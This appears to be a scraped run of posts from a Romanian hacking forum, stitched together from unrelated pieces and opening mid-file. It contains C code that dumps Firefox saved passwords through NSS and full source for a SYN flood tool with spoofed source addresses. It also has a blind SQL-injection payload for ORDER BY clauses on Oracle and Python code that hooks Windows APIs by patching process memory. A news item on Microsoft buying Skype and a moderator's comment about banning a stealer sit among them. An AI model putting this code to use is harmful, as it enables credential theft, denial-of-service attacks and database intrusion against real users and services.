"SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command"; char path[_MAX_PATH] =""; char *FFDir = NULL; DWORD pathSize = _MAX_PATH; DWORD valueType; HKEY rkey; // Open firefox registry key if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS ) { printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey ); return NULL; } // Read the firefox path if( RegQueryValueEx(rkey, NULL, 0, &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS ) { printf("\n Failed to read the firefox path value from registry "); RegCloseKey(rkey); return NULL; } if( pathSize <= 0 || path[0] == 0) { printf("\n Unable to locate firefox installation path"); RegCloseKey(rkey); return NULL; } RegCloseKey(rkey); // Remove extra quotes if( path[0] == '\"' ) { for(int i=0; i < strlen(path)-1 ; i++) path[i] = path[i+1]; } printf("\n Firefox main exe: %s", path); // Terminate the string at last "\\" for(int j=strlen(path)-1; j>0; j--) { if( path[j] == '\\' ) { path[j]=0; break; } } FFDir = (char*) malloc( strlen(path) + 1); if(FFDir) strcpy(FFDir, path); printf("\n Firefox path: %s", FFDir); return FFDir; } //----------------------------------------------------------------------- char *GetFFProfilePath() { char profilePath[_MAX_PATH] = ""; char partialPath[] = "Application Data\\Mozilla\\Firefox"; char profileFile[_MAX_PATH]; char line[1024]; DWORD pathSize = _MAX_PATH; char *finalProfilePath = NULL; int isDefaultFound = 0; HANDLE token; // Get current user's profile directory if( OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token) == FALSE ) { printf("\n Failed to get current process token "); return NULL; } if( GetUserProfileDirectory(token, profilePath, &pathSize) == FALSE ) { printf("\n Failed to get user profile directory"); return NULL; } printf("\n User Profile directory: %s\n", profilePath); // Get firefox profile directory strcpy(profileFile, profilePath); strcat(profileFile,"\\"); strcat(profileFile,partialPath); strcat(profileFile,"\\profiles.ini"); // Open the firefox profile setting file FILE *profile = fopen(profileFile, "r"); if( profile == NULL ) { printf("\n Unable to find firefox profile file: %s ", profileFile); return NULL; } // This indicates that we are looking under default profile while(fgets(line, 1024, profile)) { StrLwr(line); if( !isDefaultFound && ( strstr(line, "name=default") != NULL) ) { isDefaultFound = 1; continue; } // Found default profile / check for path if( isDefaultFound ) { if( strstr(line,"path=") != NULL) { char *slash = strstr(line,"/"); if( slash != NULL ) *slash = '\\'; // remove \n from the end of line line[strlen(line)-1] = 0; char *start = strstr(line,"="); int totalLen = strlen(profilePath) + strlen(partialPath) + strlen(start) + 3 ; finalProfilePath = (char *) malloc(totalLen); if( finalProfilePath ) { strcpy(finalProfilePath,profilePath); strcat(finalProfilePath,"\\"); strcat(finalProfilePath,partialPath); strcat(finalProfilePath,"\\"); strcat(finalProfilePath,start+1); printf("\n Final profile path: %s \n", finalProfilePath); } break; } } } fclose(profile); return finalProfilePath; } //----------------------------------------------------------------------- char *GetFFVersion() { char regSubKey[] = "SOFTWARE\\Mozilla\\Mozilla Firefox"; char *FFVers = NULL; DWORD pathSize = _MAX_PATH; DWORD valueType; HKEY rkey; // Open firefox registry key if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS ) { printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey ); return NULL; } // Read the firefox path value if( RegQueryValueEx(rkey, "CurrentVersion", 0, &valueType, (unsigned char*)&Vers, &pathSize) != ERROR_SUCCESS ) { printf("\n Failed to read the firefox version from registry "); RegCloseKey(rkey); return NULL; } if( pathSize <= 0 || Vers[0] == 0) { printf("\n Path value read from the registry is empty"); RegCloseKey(rkey); return NULL; } RegCloseKey(rkey); FFVers = (char*) malloc( strlen(Vers) + 1); if( FFVers ) strcpy(Vers,FFVers); if (FFVers[1] == '1') { version = 1; }else{ if (FFVers[1] == '2') { version = 2; }else{ if (FFVers[1] == '3') { version = 3; } } } printf("\n Firefox version: %d", version); return (FFVers); } //----------------------------------------------------------------------- int main(int argc, char* argv[]) { char *ProfilePath = NULL; //Profile path char *FFDir = NULL; //Firefox main installation path char buff[1024]; ProfilePath = GetFFProfilePath(); if( !DirectoryExists(ProfilePath)) { printf("\n\n Firefox profile directory does not exist or no profiles found. \n"); return 0; } FFDir = GetFFLibPath(); if( !DirectoryExists(ProfilePath)) { printf("\n\n Firefox installation path does not exist or is not installed. \n"); return 0; } if( InitFFLibs(FFDir) ) { if( InitializeNSSLibrary(ProfilePath) ) { //Take 3 Mozilla dumps DumpCache(ProfilePath,"signons.txt"); DumpCache(ProfilePath,"signons2.txt"); DumpCache(ProfilePath,"signons3.txt"); //DumpCache(ProfilePath,"signons.sqlite"); //Dont forget to flush :/ NSSUnload(); } } printf("\n ======================= End Cache Dump =======================\n"); while(1){ Sleep(10000); //Just loop until user exits } } //----------------------------------------------------------------------- Sursa: LeetCoders

[GNU Linux C] SYN Flooder source Author: jakash3 (cred) C source code for Linux for sending multiple SYN flagged tcp/ip packets with spoofed source addresses to spawn half-open fake connections with tcp hosts. A form of DoS attack using ipv4 addressing that may still work against hosts without syn cookies enabled. Using raw tcp ipv4 sockets, it sends packets in the form of an IP header and an appended TCP header with no initial data. Checksum for IP header is calculated for the IP header only, while checksum for TCP header is calculated for the TCP pseudo-header concatenated with the actual TCP header and data. synflood.c #include "tcpip.h" #include <stdio.h> #include <stdlib.h> #include <string.h> #include <time.h> #include <signal.h> #include <errno.h> ushort csum(short* data, int len); char* randip(char* dst); ushort rand16(); uint rand32(); int sd; void help() { printf("SYN flooder - by Jakash3\nArguments: IPV4_ADDR PORT\n"); exit(1); } void quit(int sig) { close(sd); exit(0); } int main(int argc, char** argv) { if (argc!=3) help(); /* Map CTRL-C to quit() */ struct sigaction sa; sa.sa_handler = &quit; sa.sa_flags = 0; sigemptyset(&sa.sa_mask); sigaction(SIGINT, &sa, 0); char rip[16]; char packet[4096]; struct iphdr ip; struct tcpph tph; struct tcphdr tcp; struct sockaddr_in sin; const int on = 1; memset(&packet, 0, 40); ip.ihl = 5; ip.ipv = 4; ip.tos = 0; ip.len = IPHDR_LEN + TCPHDR_LEN; ip.id = htons(rand16()); ip.ttl = 64; ip.proto = IPPROTO_TCP; ip.src = (uint)inet_addr(randip(rip)); ip.dst = (uint)inet_addr(argv[1]); ip.chksum = 0; ip.chksum = csum((short*)&ip, IPHDR_LEN); tcp.sport = htons((short)atoi(argv[2])); tcp.dport = htons((short)atoi(argv[2])); tcp.seq = htonl(rand32()); tcp.offset = sizeof(struct tcphdr) / 4; tcp.flgs = TCP_SYN; tcp.chksum = 0; tph.src = ip.src; tph.dst = ip.dst; tph.zero = 0; tph.proto = IPPROTO_TCP; tph.tcp_len = sizeof(struct tcphdr); memmove(packet, &tph, TCPPH_LEN); memmove(packet + TCPPH_LEN, &tcp, TCPHDR_LEN); tcp.chksum = csum((short*)packet, TCPPH_LEN + TCPHDR_LEN); memmove(packet, &ip, IPHDR_LEN); memmove(packet + IPHDR_LEN, &tcp, TCPHDR_LEN); sd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); if (sd == -1) { printf("Failed to create socket. Error code: %d\n", errno); exit(1); } if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) == -1) { printf("Failed to set socket options. Error code: %d\n", errno); exit(1); } sin.sin_family = AF_INET; sin.sin_port = htons(tcp.dport); memmove(&(sin.sin_addr), &(ip.dst), sizeof(struct in_addr)); while (1) { if (sendto(sd, packet, ip.len, 0, (struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) { printf("Failed to send SYN packet(s). Error code: %d\n", errno); exit(1); } else { printf("Sent SYN packet with spoofed ip: %s\n", rip); } ip.id = htons(rand16()); ip.src = (uint)inet_addr(randip(rip)); ip.chksum = 0; ip.chksum = csum((short*)&ip, IPHDR_LEN); tph.src = ip.src; tcp.seq = htonl(rand32()); tcp.chksum = 0; memmove(packet, &tph, TCPPH_LEN); memmove(packet + TCPPH_LEN, &tcp, TCPHDR_LEN); tcp.chksum = csum((short*)packet, TCPPH_LEN + TCPHDR_LEN); memmove(packet, &ip, IPHDR_LEN); memmove(packet + IPHDR_LEN, &tcp, TCPHDR_LEN); } } ushort csum(short* data, int len) { int sum = 0; for (; len > 1; len -= 2) sum += *data++; if (len == 1) sum += *(uchar*)data; while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16); return ~sum; } /* The best I can do for generating a random ipv4 address */ char* randip(char* dst) { dst[0] = 0; int i, j, k; srandom(time(0)); srand(random()); srandom(rand()); j = rand() + random(); for (i = 0, k = 0; k < 4; i += strlen(dst + i), k++, j += ((rand() + (int)dst) % i) ^ time(0)) { srand((int)dst + i + k); srand(j + dst[i+k] + (int)&i + rand()); j = rand() % 255; sprintf(dst + i, "%d.", j); } dst[i-1] = 0; return dst; } ushort rand16() { srandom(time(0)); srand(random()); srandom(rand()); return (random() + rand() + time(0)) % 65535; } uint rand32() { srandom(time(0)); srand(random()); srandom(rand()); return (random() + rand() & time(0)); } tcpip.h #include <unistd.h> #include <netinet/in.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netdb.h> typedef unsigned char uchar; typedef unsigned short ushort; typedef unsigned int uint; /* Internet Datagram Header */ #define IPHDR_LEN 20 struct iphdr { uchar ipv:4; /* Internet Protocol Version */ uchar ihl:4; /* Total length (in DWORDs) */ uchar tos; /* Type of Service */ ushort len; /* Total length */ ushort id; /* Identification number */ ushort frag; /* Fragment offset and flags */ uchar ttl; /* Time to live */ uchar proto; /* Protocol type */ ushort chksum; /* Checksum */ uint src; /* Source IP Address */ uint dst; /* Destination IP Address */ }; /* TCP Header */ #define TCPHDR_LEN 20 struct tcphdr { ushort sport; /* Source Port */ ushort dport; /* Destination Port */ uint seq; /* Sequence number */ uint ack; /* Acknowledgement number */ uchar reserved:4; uchar offset:4; /* Size of TCP Header in DWORDs */ uchar flgs; /* TCP Flags */ #define TCP_FIN 0x01 #define TCP_SYN 0x02 #define TCP_RST 0x04 #define TCP_PSH 0x08 #define TCP_ACK 0x10 #define TCP_URG 0x20 ushort win; /* Window. Size of data to accept */ ushort chksum; /* Checksum */ ushort urgp; /* idk */ }; /* TCP Psuedo-header */ #define TCPPH_LEN 12 struct tcpph { uint src; uint dst; uchar zero; uchar proto; ushort tcp_len; }; Sursa: LeetCoders

Exploiting SQL Injection in ORDER BY on Oracle/MySQL submitted by alla on 10 May, 2011 - 15:10 Consider the following piece of code: $sql = "SELECT something FROM some_table WHERE id=? ORDER BY $column_name"; The WHERE clause is parametrized, but the ORDER BY isn't. This happens often enough. Assuming that $column_name comes from user input, this code is vulnerable to SQL injection. The way to exploit such SQL injection on MySQL backend is described by Sumit Siddharth here and by Jacco van Tuijl here I couldn't find any clues for Oracle though, so now that I have figured it out, here is how. This is a blind SQL injection technique - we'll have to extract one bit of info per query, using the order in which the data is returned by the application. Let's assume that the vulnerable script is called as vulnerable.php?sortcolumn=id . In this case it returns the following data: foo bar baz We can try sorting by other columns and see if the data gets returned in different order. Say, if we try vulnerable.php?sortcolumn=something, we get back: bar baz foo Now all we need to do is to get the query to sort the data by different column depending on the value of a given expression. In Oracle the following syntax works: ORDER BY (case when ((boolean_expression)) then id else something end) If boolean_expression is true the result will be sorted by id, otherwise by something. So, the vulnerable script may be called like this: vulnerable.php?sortcolumn=(case+when+((ASCII(SUBSTR((select+table_name+from+all_tables+where+rownum%3d1),1))>%3D128))+then+id+else+something+end) This will extract the most significant bit of the first character of the first row returned by "select table_name from all_tables" query. Actually fetching significant amounts of data obviously requires automation. MySQL: http://www.notsosecure.com/folder2/2008/08/01/injection-in-order-by-clause/ http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/ Sursa: http://www.gremwell.com/exploiting_sql_injection_in_order_by_on_oracle

Microsoft confirms purchase of Skype for $8.5 billion Tom Warren 2 hours ago Microsoft announced on Tuesday the acquisition of Skype. The software giant announced the deal on Tuesday, valued at $8.5 billion cash. Both Skype and Microsoft’s board of directors have approved the deal and Microsoft will create a new business division especially for Skype. Skype CEO Tony Bates will assume the title of president of the Microsoft Skype Division, reporting directly to Ballmer. “Skype is a phenomenal service that is loved by millions of people around the world,” said Microsoft CEO Steve Ballmer. “Together we will create the future of real-time communications so people can easily stay connected to family, friends, clients and colleagues anywhere in the world.” Microsoft says Skype will support Microsoft devices like Xbox and Kinect, Windows Phone and a wide array of Windows devices, and Microsoft will connect Skype users with Lync, Outlook, Xbox Live and other communities. Microsoft will continue to invest in and support Skype clients on non-Microsoft platforms. “Tony Bates has a great track record as a leader and will strengthen the Microsoft management team. I’m looking forward to Skype’s talented global workforce bringing its insights, ideas and experience to Microsoft,” Ballmer said. Skype currently has 170 million connected users and saw over 207 billion minutes of voice and video conversations in 2010 alone. Microsoft’s promise for Windows Phone, Xbox and Kinect Skype integration confirms that the company will look to use Skype broadly across its products. Skype was originally founded in 2003 and acquired by eBay in September 2005. An investment group led by Silver Lake acquired Skype in 2009. Speaking on behalf of the investor group that sold Skype to Microsoft, Egon Durban, managing director of Silver Lake, said: “We are thrilled with Skype’s transformation during the period of our ownership and grateful for the extraordinary commitment of its management team and employees. We are excited about Skype’s long-term future with Microsoft, as it is poised to become one of the world’s most dynamic and comprehensive communications platforms.” Sursa: Microsoft confirms purchase of Skype for $8.5 billion | WinRumors

API Hooking in Python Author: cadaver (cred) # patcher.py # handles patching and unpatching of process memory. # public domain code. from ctypes import * from win32api import * from pytcc import pytcc from struct import pack, unpack, calcsize from win32gui import PyGetString, PySetMemory, PySetString from win32con import MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS from distorm import Decode DEBUG = True def DB (msg): global DEBUG if DEBUG: print (msg) def OpenProcess (pid=GetCurrentProcessId()): """Opens a process by pid.""" DB ("[openProcess] pid:%s."%pid) phandle = windll.kernel32.OpenProcess (\ PROCESS_ALL_ACCESS, False, pid ) assert phandle, "Failed to open process!\n%s" % WinError (GetLastError ()) [1] return phandle def readMemory (phandle, address, size): """readMemory (address, size, phandle):""" cbuffer = c_buffer (size) success = windll.kernel32.ReadProcessMemory (\ phandle, address, cbuffer, size, 0 ) assert success, "Failed to read memory!\n%s" % WinError (GetLastError()) [1] return cbuffer.raw def writeMemory (phandle, address=None, data=None): """Writes data to memory and returns the address.""" assert data size = len (data) if isinstance (data, str) else sizeof (data) cdata = c_buffer (data) if isinstance (data, str) else byref (data) if not address: address = allocate (size, phandle) success = windll.kernel32.WriteProcessMemory (\ phandle, address, cdata, size, 0 ) assert success, "Failed to write process memory!\n%s" % WinError (GetLastError()) [1] DB ("[write memory] :%s OK." % address) return address def allocate (size, phandle): """Allocates memory of size in phandle.""" address = windll.kernel32.VirtualAllocEx (\ phandle, 0, size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) assert address, "Failed to allocate memory!\n%s" % WinError(GetLastError()) [1] DB ("[memory allocation] :%s" % address) return address def releaseMemory (address, size, phandle): """Releases memory by address.""" return windll.kernel32.VirtualFreeEx (\ phandle, address, size, MEM_RELEASE ) assert success, "Failed to read process memory!\n%s" % WinError(GetLastError()) [1] return cbuffer.raw def transport (data, phandle): size = len (data) memory = allocate (size, phandle) writeMemory (phandle, memory, data) return memory def get_patch (destination, params_size=0): """mov eax, destination call eax retn params_size """ if isinstance (destination, (int,long)): destination = pack ("i", destination) if isinstance (params_size, (int,long)): params_size = pack ("h", params_size) return '\xb8%s\xff\xd0\xc2%s' % (destination, params_size) def get_cparams_size (cparams): if not cparams: return 0 s = '' for param in cparams: s += "size += sizeof (%s);\n" % param c_code = """ int getsize () { int size = 0; %s return size; }""" % s #DB (c_code) ccompiler = pytcc () ccompiler.compile (c_code) ccompiler.relocate () getsize = ccompiler.get_function ("getsize") size = getsize () # ccompiler.delete () return size def get_cparams_size_b (cparams): return sum (map (calcsize, [param._type_ for param in cparams])) def find_good_spot_to_patch (apiaddress, needed_size, maxscan=4000): """find_good_spot_to_patch (apiaddress, needed_size, maxscan=4000): Searches the instructions inside an API for a good place to patch.""" # DEBUG if DEBUG == 2: bytes = PyGetString (apiaddress, needed_size * 2) dprint (apiaddress, bytes) # # # # aoffset = 0 found_space = 0 position = apiaddress while found_space < needed_size: bytes = PyGetString (position, 24) # DB ("found_space: %s. aoffset: %s. apiaddress: %s." % (found_space, aoffset, hex(position))) # if does_code_end_function (bytes): raise "Function end found before enough space was found!" offset, size, instruction, hexstr = Decode (position, bytes) [0] if "ret" in instruction.lower (): raise "Function end found before enough space was found!" if not filter (lambda x:x.lower() in instruction.lower(), ["call", "jmp"]): found_space += size else: found_space = 0 aoffset += size if aoffset >= maxscan: raise "Maxscan exceeded while searching for a good spot to patch!" position += size return apiaddress + (aoffset - found_space) class patcher: source = None destination = None jmp_asm = None original_bytes = None params_size = 0 pid = None phandle = None duplicate_api = None original_api = None def __init__ (self, source=None, destination=None, params_size=0, pid=GetCurrentProcessId () ): self.set_pid (pid) self.set_source (source) self.set_destination (destination) self.set_params_size (params_size) def set_pid (self, pid): self.close () self.phandle = OpenProcess (pid) self.pid = pid def set_source (self, source): self.source = source def set_destination (self, destination): self.destination = destination def set_params_size (self, size): self.params_size = size def set_source_as_api (self, apiname, dllname="kernel32.dll", free=True): module = LoadLibrary (dllname) procedure = GetProcAddress (module, apiname) if free: FreeLibrary (module) assert procedure self.original_api = eval ("windll.%s.%s" % (dllname.strip(".dll"), apiname)) self.source = find_good_spot_to_patch (procedure, len (get_patch (0, self.params_size))) if DEBUG: DB ("found good spot to patch: %s %s. Offset from original api address: %s." \ %(self.source, hex (self.source), self.source - procedure)) def patch (self): assert all ((self.phandle, self.source, self.destination)), "Patch source or destination not set!" assert not self.original_bytes, "Already patched!" self.jmp_asm = get_patch (self.destination, self.params_size) jmp_asm_size = len (self.jmp_asm) self.original_bytes = PyGetString (self.source, jmp_asm_size) assert self.original_bytes, "Failed to capture original_bytes." writeMemory (\ phandle=self.phandle, address=self.source, data=self.jmp_asm) msg = "[jmp_asm]:%s\n[jmp_asm_size]:%s\n[original_bytes]:%s\n" \ % (repr (self.jmp_asm), jmp_asm_size, repr (self.original_bytes)) DB (msg) def unpatch (self): if not self.original_bytes: raise "Not patched!" assert all ((self.phandle, self.source, self.destination)), "Not initialized!" writeMemory (\ phandle=self.phandle, address=self.source, data=self.original_bytes ) self.original_bytes = None def close (self): if self.phandle: windll.kernel32.CloseHandle (self.phandle) self.phandle = None def release (self): if self.phandle and self.duplicate_api: releaseMemory (self.duplicate_api, 0, self.phandle) def call_original_api (self, *args, **kwargs): return self.original_api (*args, **kwargs) def call_duplicate_api (self, types, *args, **kwargs): return WINFUNCTYPE (c_void_p, types) (self.duplicate_api) (*args, **kwargs) def __del__ (self): try:self.unpatch () except:pass try:self.release () except:pass try:self.close () except:pass def dprint (a, c): """Pretty prints disassembled bytes. dprint (offset, bytes).""" x = Decode (a, c) print "[deci addr : hexi addr] [size] instruction\n" for offset, size, instruction, hexstr in x: print "[%s : %s] [%s] %s" % (a,hex (a), size, instruction) a += size print #cad # tramper.py # Relocates bytes of an API and creates a jump from those bytes to the original API affectively negating a hook. # TODO !Recalculate Relocated Relative jmp and call addresses. # public domain code. from ctypes import * from win32api import * from pytcc import pytcc from struct import pack, unpack from win32gui import PyGetString, PySetMemory, PySetString from win32con import MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS from distorm import Decode from patcher import OpenProcess, readMemory, writeMemory, allocate, transport DEBUG = True def DB (msg): global DEBUG if DEBUG: print (msg) def tramper (apiaddress, hook_size, apiname=None, dllname="kernel32"): """tramper (apiaddress, hook_size, apiname=None, dllname="kernel32"): Creates a duplicate API using the trampoline method and returns its address. """ if DEBUG: global hprocess, landing_offset, instructions, landing_address, tramp_memory, tramp_code, original_bytes if not apiaddress: dll = LoadLibrary (dllname) apiaddress = GetProcAddress (dll, apiname) landing_offset = 0 hprocess = OpenProcess () original_bytes = PyGetString (apiaddress, 300) tramp_memory = allocate (len (original_bytes) + 50, hprocess) print "Tramp memory: %s %s." % (tramp_memory, hex (tramp_memory)) instructions = Decode (apiaddress, original_bytes) sizes = iter ([X[1] for X in instructions]) while landing_offset < hook_size: landing_offset += sizes.next () landing_address = apiaddress + landing_offset DB ("Landing offset : %s %s" % (landing_offset, hex (landing_offset))) DB ("Landing address: %s %s" % (landing_address, hex (landing_address))) distance = landing_address - (tramp_memory +landing_offset) DB ("Distance: %s %s." % (distance, hex (distance))) tramp_code = original_bytes [:landing_offset] # api start - past hook - to start of instruction instructions = Decode (apiaddress, tramp_code) boffset = 0 for offset, size, instruction, hexstr in instructions: if filter (lambda x:x.lower() in instruction.lower(), ["call", "jmp"]): raise "[not supported yet] Cannot relocate CALL/JMP Instructions. Address: %s"% (apiaddress + boffset) boffset += size # # TODO !Recalculate Relocated Relative jmp and call addresses. # jump_code = '\xe9' + pack ("i", distance - 5) # bytes = jmp (distance - size of jump) tramp_code += jump_code # DEBUG DB ("Tramp [size]: %s [bytes]; %s" % (len(tramp_code), (repr(tramp_code)))) DB ("Tramper api decode.") if DEBUG: dprint (apiaddress, tramp_code) # # # # writeMemory (hprocess, tramp_memory, tramp_code) CloseHandle (hprocess) return tramp_memory def dprint (a, c): """ pretty print disassembled bytes. dprint (offset, bytes).""" x = Decode (a, c) print "[deci addr : hexi addr] [size] instruction\n" for offset, size, instruction, hexstr in x: print "[%s : %s] [%s] %s" % (a,hex (a), size, instruction) a += size if __name__ == "__main__": # Test. lib = LoadLibrary ("kernel32") OpenProcessAddr = GetProcAddress (lib, "OpenProcess") FreeLibrary (lib) trampAddr = tramper (\ apiaddress=OpenProcessAddr, # (optional if apiname is defined) API address to duplicate. hook_size=10, # size of our API jmp code. (minimum size of relocated API bytes) apiname=None, # (optional) dllname="kernel32") # (optional / defaults to kernel32) # Prototype the OpenProcess trampoline. duplicate_OpenProcess = WINFUNCTYPE (c_int, c_int, c_int, c_int) (trampAddr) pid = GetCurrentProcessId () print "Calling duplicate OpenProcess with pid: %s" % pid phandle = duplicate_OpenProcess (0x1f0fff, 0, pid) print "Return value: %s." %phandle if phandle: CloseHandle (phandle) #cad # hooker.py # deals with hooking of win32 APIs. # public domain code. from patcher import * from tramper import tramper from win32api import * from pytcc import pytcc def create_hook (duplicate_api, cparam_types='', prelogic="", postlogic="", restype="int"): """ create_hook (pat, duplicate_api, cparam_types='', prelogic="", postlogic="", restype="int"): """ c_code =\ """ %s function (int caller, %s) { %s %s RET = DUPE ( %s ); %s return RET; }""" cargs = '' symbols = '' for arg, char in zip (cparam_types, "ABCDEFGHIJKLMNOPQRSTUVWXYZ"): symbols += "%s, " % char cargs += "%s %s, " % (arg, char) symbols = symbols [:-2] cargs = cargs [:-2] c_code = c_code % (restype, cargs, prelogic, restype, symbols, postlogic) ccompiler = pytcc () ccompiler.add_lib_proc ("msvcrt.dll", "memset") ccompiler.add_symbol ("DUPE", duplicate_api) ccompiler.compile (c_code) ccompiler.relocate () hook = ccompiler.get_symbol ("function") return (c_code, hook) def hooker (apiname, cparam_types=list(), restype="int", prelogic='', postlogic='', pid=GetCurrentProcessId(), dllname="kernel32"): """hooker (apiname, cparam_types=list(), restype="int", prelogic='', postlogic='', pid=GetCurrentProcessId(), dllname="kernel32"): """ pat = patcher () params_size = get_cparams_size (cparam_types) pat.set_params_size (params_size) pat.set_source_as_api (apiname, dllname) hook_size = len (get_patch (pat.destination, pat.params_size)) tramp = tramper (pat.source, hook_size) pat.duplicate_api = tramp hook_ccode, hooks = create_hook (tramp, cparam_types, prelogic, postlogic, restype) pat.c_code = hook_ccode pat.set_destination (hooks) return pat if __name__ == '__main__': # Test. hook = hooker (\ # API to hook apiname="OpenProcess", # the DLL the API is in. (defaults to kernel32) dllname="kernel32", # (required) API parameter types. In our hook these get translated to the names A,B,C...respectively. cparam_types=["int", "int", "int"], # (required) the API return type. restype="int", # (optional) this is the code in our hook wich is executed Before the real API. prelogic="if (C==1) {return 1111;}", # (optional) this is the code in our hook wich is executed After the real API. The real API's return value is named RET. postlogic="if (RET) {return 0;}" ) # hook API. # hook automatically unhooks itself and cleans up when it isnt refered to anymore. hook.patch () print "Calling hooked OpenProcess api with process id as 1." ret = windll.kernel32.OpenProcess (0x1f0fff, 0, 1) print "Return value: %s" % ret if ret == 1111: print "This test was sucesful." else: print "Return value is unexpected." # unhook API. # hook.unpatch () #cad Download: http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3110 Sursa: API Hooking in Python - rohitab.com - Forums

Nu, continea SQLite, deci 99% era un Stealer, care printre altele era si pentru Firefox. Nu m-am chinuit sa analizez fisierul, am vazut aia, am dat ban.